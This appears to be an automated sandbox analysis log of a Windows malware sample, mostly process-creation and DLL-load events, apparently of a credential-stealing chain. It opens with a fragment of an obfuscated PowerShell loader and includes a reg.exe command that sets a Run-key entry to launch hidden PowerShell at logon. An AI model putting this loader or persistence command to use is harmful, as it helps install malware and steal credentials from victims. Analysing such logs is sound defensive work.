eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belinda103.Eft && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bilateralities" /t REG_EXPAND_SZ /d "%Arrestationernes110% -w 1 $Faucals83=(Get-ItemProperty -Path 'HKCU:\sttyskers\').talevant;%Arrestationernes110% ($Faucals83)"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bilateralities" /t REG_EXPAND_SZ /d "%Arrestationernes110% -w 1 $Faucals83=(Get-ItemProperty -Path 'HKCU:\sttyskers\').talevant;%Arrestationernes110% ($Faucals83)"
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	Process created: C:\Windows\SysWOW64\srdelayed.exe "C:\Windows\SysWOW64\srdelayed.exe"
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	Process created: C:\Windows\SysWOW64\relog.exe "C:\Windows\SysWOW64\relog.exe"
Source: C:\Windows\SysWOW64\relog.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: pstorec.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: pstorec.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
